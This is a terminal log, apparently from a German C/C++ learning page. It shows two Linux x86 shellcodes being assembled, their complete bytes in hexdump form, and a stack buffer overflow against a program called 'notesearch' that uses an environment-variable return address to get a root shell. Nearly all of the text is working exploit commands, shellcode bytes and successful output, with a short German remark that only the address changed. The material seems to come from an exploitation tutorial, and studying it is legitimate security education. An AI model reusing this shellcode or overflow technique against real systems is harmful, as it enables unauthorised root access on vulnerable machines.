root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm exec_shell.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# wc -c exec_shell
36 exec_shell
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b  |..[1..C..[..C..K|
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69  |..S........../bi|
00000020  6e 2f 73 68                                       |n/sh|
00000024
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat exec_shell)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff8cf
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./notesearch $(perl -e 'print "\xcf\xf8\xff\xbf"x40')
[DEBUG] found a 31 byte note for user id 0
-------[ end of note data ]-------
# whoami
root
# su
 
Nur die Adresse hat sich geändert

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm tiny_shell.s               
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# wc -c tiny_shell
25 tiny_shell
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C tiny_shell
00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 50  |1.Ph//shh/bin..P|
00000010  89 e2 53 89 e1 b0 0b cd  80                       |..S......|
00000019
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat tiny_shell)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffffe2b
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./notesearch $(perl -e 'print "\x2b\xfe\xff\xbf"x40')
[DEBUG] found a 31 byte note for user id 0
-------[ end of note data ]-------
# ^C
# exit

Nur die Adresse hat sich geändert

 

   

Jetzt c/c++ lernen  

   
© ALLROUNDER